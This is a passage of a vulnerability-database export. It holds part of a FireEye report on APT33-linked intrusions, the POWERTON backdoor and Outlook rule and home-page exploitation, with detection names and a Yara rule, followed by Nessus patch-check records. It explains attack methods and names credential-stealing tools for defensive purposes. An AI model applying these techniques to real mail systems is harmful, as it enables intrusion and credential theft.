\u2013 AUT2EXE (Compiled)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-02 07:57:40\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\nfa7790abe9ee40556fb3c5524388de0b \n \n2018-07-16 00:33:01\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 01:39:58\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-07-16 08:36:13\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n46038aa5b21b940099b0db413fa62687 \n \n2018-07-31 22:09:25\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n129c296c363b6d9da0102aa03878ca7f \n \n2018-08-06 16:27:05\n\n| \n\nGroupB \u2013 POSHC2 (Compiled)\n\n| \n\nfca0ad319bf8e63431eb468603d50eff \n \n2018-08-07 05:10:05\n\n| \n\nGroupB \u2013 POSHC2 (Used)\n\n| \n\n75e680d5fddbdb989812c7ba83e7c425 \n \n2018-08-29 18:14:18\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n5832f708fd860c88cbdc088acecec4ea \n \n2018-10-09 16:02:55\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n8d3fe1973183e1d3b0dbec31be8ee9dd \n \n2018-10-09 16:48:09\n\n| \n\nAPT33 \u2013 POSHC2 (Used)\n\n| \n\n48d1ed9870ed40c224e50a11bf3523f8 \n \n2018-10-11 21:29:22\n\n| \n\nGroupB \u2013 POWERTON (Used)\n\n| \n\n8be06571e915ae3f76901d52068e3498 \n \n2018-12-13 11:00:00\n\n| \n\nGroupB \u2013 POWERTON (Identified)\n\n| \n\n99649d58c0d502b2dfada02124b1504c \n \nTable 1: Operational Timeline\n\n#### Outlook and Implications\n\nIf the activities observed during these intrusions are linked to APT33, it would suggest that APT33 has likely maintained proprietary capabilities we had not previously observed until sustained pressure from Managed Defense forced their use. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. This risk is pronounced in the energy sector, which we consistently observe them target. That targeting aligns with Iranian national priorities for economic growth and competitive advantage, especially relating to petrochemical production.\n\nWe will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.\n\n#### Custom Backdoor: POWERTON\n\nPOWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including [WMI](<https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html>) and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.\n\nFireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.\n\nTable 2 contains samples of POWERTON.\n\n**Hash of Obfuscated File (MD5)**\n\n| \n\n**Hash of Deobfuscated File (MD5)**\n\n| \n\n**Version** \n \n---|---|--- \n \n**974b999186ff434bee3ab6d61411731f**\n\n| \n\n3871aac486ba79215f2155f32d581dc2\n\n| \n\nV1 \n \n**e2d60bb6e3e67591e13b6a8178d89736**\n\n| \n\n2cd286711151efb61a15e2e11736d7d2\n\n| \n\nV1 \n \n**bd80fcf5e70a0677ba94b3f7c011440e**\n\n| \n\n5a66480e100d4f14e12fceb60e91371d\n\n| \n\nV1 \n \n**4047e238bbcec147f8b97d849ef40ce5**\n\n| \n\nf5ac89d406e698e169ba34fea59a780e\n\n| \n\nV2 \n \n**c38069d0bc79acdc28af3820c1123e53**\n\n| \n\n4aca006b9afe85b1f11314b39ee270f7\n\n| \n\nV2 \n \n**N/A**\n\n| \n\n7f4f7e307a11f121d8659ca98bc8ba56\n\n| \n\nV2 \n \n**53ae59ed03fa5df3bf738bc0775a91d9**\n\n| \n\n99649d58c0d502b2dfada02124b1504c\n\n| \n\nV2 \n \nTable 2: POWERTON malware samples\n\n#### Adversary Methods: Email Exploitation on the Rise\n\nOutlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in [targeted adversaries challenging and subverting security controls on Exchange and Office365.](<https://summit.fireeye.com/content/fireeye-summit/en_US/learn/tracks.html#technical-3>) Our Mandiant consultants also presented [several new methods used by adversaries to subvert multifactor authentication](<https://summit.fireeye.com/learn/tracks.html#technical-8>) at FireEye Cyber Defense Summit 2018.\n\nAt FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.\n\nAn adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:\n\n * Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?\n * Previous compromise within your organization where credentials were compromised but not identified or reset.\n * Poor password choice or password security policies resulting in brute-forced credentials.\n * Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via [documents](<https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/>) intended to phish them from users.\n * Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.\n\nOnce the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange\u2019s legitimate features.\n\n#### RULER In-The-Wild: Here, There, and Everywhere\n\nSensePost\u2019s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the \"Managed Defense Rapid Responses\" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with _Aut2Exe_ (MD5: _95f3bea43338addc1ad951cd2d42eb6f)_, and executed a PowerShell one-liner to retrieve further malicious content.\n\nWithout the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:\n\n * Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.\n * The transfer of _95f3bea43338addc1ad951cd2d42eb6f_ was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that [WebDAV hosted payload](<https://github.com/sensepost/ruler/wiki/Rules#webdav>).\n * The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be \"locally\" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's [initial write-up](<https://silentbreaksecurity.com/malicious-outlook-rules/>) prior to RULER\u2019s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.\n * The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. _95f3bea43338addc1ad951cd2d42eb6f_ does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.\n\nWith that in mind, the initial infection vector is illustrated in Figure 4.\n\n \nFigure 4: Initial infection vector\n\nAs both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible [disclosure of CVE-2017-11774](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-11774>) was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker\u2019s perspective, [refer to SensePost's blog](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>).\n\nFireEye [has observed](<https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf>) and [documented](<https://twitter.com/ItsReallyNick/status/1014522001900306433>) an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.\n\nUnderstanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost\u2019s RULER.\n\n**Microsoft Outlook Security Update**\n\n| \n\n**RULER Module Addressed** \n \n---|--- \n \n[June 13, 2017 Security Update](<https://support.microsoft.com/en-us/help/3191938/descriptionofthesecurityupdateforoutlook2013june13-2017>)\n\n| \n\n[RULER.RULES](<https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/>) \n \n[September 12, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011091/descriptionofthesecurityupdateforoutlook2016september12-2017>)\n\n| \n\n[RULER.FORMS](<https://sensepost.com/blog/2017/outlook-forms-and-shells/>) \n \n[October 10, 2017 Security Update](<https://support.microsoft.com/en-us/help/4011162/description-of-the-security-update-for-outlook-2016-october-10-2017>)\n\n| \n\n[RULER.HOMEPAGE](<https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/>) \n \nTable 3: Outlook attack surface mitigations\n\n#### Detecting the Techniques\n\nFireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.****\n\n**PLATFORM**\n\n| \n\n**SIGNATURE NAME** \n \n---|--- \n \nEndpoint Security\n\n| \n\nPOWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY) \nSUSPICIOUS POWERSHELL USAGE (METHODOLOGY) \nMIMIKATZ (CREDENTIAL STEALER) \nRULER OUTLOOK PERSISTENCE (UTILITY) \n \nNetwork and Email Security\n\n| \n\nFE_Exploit_HTML_CVE201711774 \nFE_HackTool_Win_RULER \nFE_HackTool_Linux_RULER \nFE_HackTool_OSX_RULER \nFE_Trojan_OLE_RULER \nHackTool.RULER (Network Traffic) \n \nTable 4: FireEye product detections\n\nFor organizations interested in hunting for Outlook home page shell and persistence, we\u2019ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:\n\nrule Hunting_Outlook_Homepage_Shell_and_Persistence \n{ \nmeta: \nauthor = \"Nick Carr (@itsreallynick)\" \nreference_hash = \"506fe019d48ff23fac8ae3b6dd754f6e\" \nstrings: \n$script_1 = \"<htm\" ascii nocase wide \n$script_2 = \"<script\" ascii nocase wide \n$viewctl1_a = \"ViewCtl1\" ascii nocase wide \n$viewctl1_b = \"0006F063-0000-0000-C000-000000000046\" ascii wide \n$viewctl1_c = \".OutlookApplication\" ascii nocase wide \ncondition: \nuint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*) \n}\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2022-06-16T15:33:58", "description": "The Microsoft .NET Framework installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests. An attacker who successfully exploited this vulnerability could cause a denial of service against a .NET Core or .NET Framework web application. The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Core or .NET Framework application. The update addresses the vulnerability by correcting how the .NET Core or .NET Framework web application handles web requests. (CVE-2020-1108)\n\n - An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level. (CVE-2020-1066)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-13T00:00:00", "type": "nessus", "title": "Security Updates for Microsoft .NET Framework (May 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1066", "CVE-2020-1108"], "modified": "2021-05-24T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS20_MAY_DOTNET.NASL", "href": "https://www.tenable.com/plugins/nessus/136564", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136564);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/24\");\n\n script_cve_id(\"CVE-2020-1066\", \"CVE-2020-1108\");\n script_xref(name:\"MSKB\", value:\"4556812\");\n script_xref(name:\"MSFT\", value:\"MS20-4556812\");\n script_xref(name:\"MSKB\", value:\"4556826\");\n script_xref(name:\"MSFT\", value:\"MS20-4556826\");\n script_xref(name:\"MSKB\", value:\"4556807\");\n script_xref(name:\"MSFT\", value:\"MS20-4556807\");\n script_xref(name:\"MSKB\", value:\"4556813\");\n script_xref(name:\"MSFT\", value:\"MS20-4556813\");\n script_xref(name:\"MSKB\", value:\"4556406\");\n script_xref(name:\"MSKB\", value:\"4556405\");\n script_xref(name:\"MSKB\", value:\"4556404\");\n script_xref(name:\"MSKB\", value:\"4556403\");\n script_xref(name:\"MSKB\", value:\"4556402\");\n script_xref(name:\"MSKB\", value:\"4556401\");\n script_xref(name:\"MSKB\", value:\"4556400\");\n script_xref(name:\"MSKB\", value:\"4556441\");\n script_xref(name:\"MSKB\", value:\"4552926\");\n script_xref(name:\"MSKB\", value:\"4552931\");\n script_xref(name:\"MSKB\", value:\"4556399\");\n script_xref(name:\"MSKB\", value:\"4552928\");\n script_xref(name:\"MSKB\", value:\"4552929\");\n script_xref(name:\"MSFT\", value:\"MS20-4556406\");\n script_xref(name:\"MSFT\", value:\"MS20-4556405\");\n script_xref(name:\"MSFT\", value:\"MS20-4556404\");\n script_xref(name:\"MSFT\", value:\"MS20-4556403\");\n script_xref(name:\"MSFT\", value:\"MS20-4556402\");\n script_xref(name:\"MSFT\", value:\"MS20-4556401\");\n script_xref(name:\"MSFT\", value:\"MS20-4556400\");\n script_xref(name:\"MSFT\", value:\"MS20-4556441\");\n script_xref(name:\"MSFT\", value:\"MS20-4552926\");\n script_xref(name:\"MSFT\", value:\"MS20-4552931\");\n script_xref(name:\"MSFT\", value:\"MS20-4556399\");\n script_xref(name:\"MSFT\", value:\"MS20-4552928\");\n script_xref(name:\"MSFT\", value:\"MS20-4552929\");\n script_xref(name:\"IAVA\", value:\"2020-A-0207-S\");\n\n script_name(english:\"Security Updates for Microsoft .NET Framework (May 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft .NET Framework installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft .NET Framework installation on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A denial of service vulnerability exists when .NET Core\n or .NET Framework improperly handles web requests. An\n attacker who successfully exploited this vulnerability\n could cause a denial of service against a .NET Core or\n .NET Framework web application. The vulnerability can be\n exploited remotely, without authentication. A remote\n unauthenticated attacker could exploit this\n vulnerability by issuing specially crafted requests to\n the .NET Core or .NET Framework application. The update\n addresses the vulnerability by correcting how the .NET\n Core or .NET Framework web application handles web\n requests. (CVE-2020-1108)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2020-1066)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556406/kb4556406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556405/kb4556405\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556404/kb4556404\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556403/kb4556403\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556402/kb4556402\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556401/kb4556401\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556400/kb4556400\");\n # https://support.microsoft.com/en-us/help/4556441/kb4556441-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0a2bc4ce\");\n # https://support.microsoft.com/en-us/help/4556813/windows-10-update-kb4556813\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?da286489\");\n # https://support.microsoft.com/en-us/help/4556807/windows-10-update-kb4556807\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8217353\");\n # https://support.microsoft.com/en-us/help/4552926/kb4552926-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3a03f407\");\n # https://support.microsoft.com/en-us/help/4556826/windows-10-update-kb4556826\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?22034bc1\");\n # https://support.microsoft.com/en-us/help/4552931/kb4552931-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6206e249\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4556399/kb4556399\");\n # https://support.microsoft.com/en-us/help/4556812/windows-10-update-kb4556812\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?229bf576\");\n # https://support.microsoft.com/en-us/help/4552928/kb4552928-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?52b55515\");\n # https://support.microsoft.com/en-us/help/4552929/kb4552929-cumulative-update-for-net-framework\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4aafe901\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for Microsoft .NET Framework.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1066\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_dotnet_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('install_func.inc');\ninclude('misc_func.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-05';\nkbs = make_list(\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && 'Windows 8.1' >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\nelse if ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\napp = 'Microsoft .NET Framework';\nget_install_count(app_name:app, exit_if_zero:TRUE);\ninstalls = get_combined_installs(app_name:app);\n\nvuln = 0;\n\nif (installs[0] == 0)\n{\n foreach install (installs[1])\n {\n version = install['version'];\n if( version != UNKNOWN_VER &&\n smb_check_dotnet_rollup(rollup_date:'05_2020', dotnet_ver:version))\n vuln++;\n }\n}\nif(vuln)\n{\n hotfix_security_warning();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-30T17:10:50", "description": "The remote Windows host is missing security update 4019214 or cumulative update 4019216. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0220)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows Server 2012 May 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0238", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": 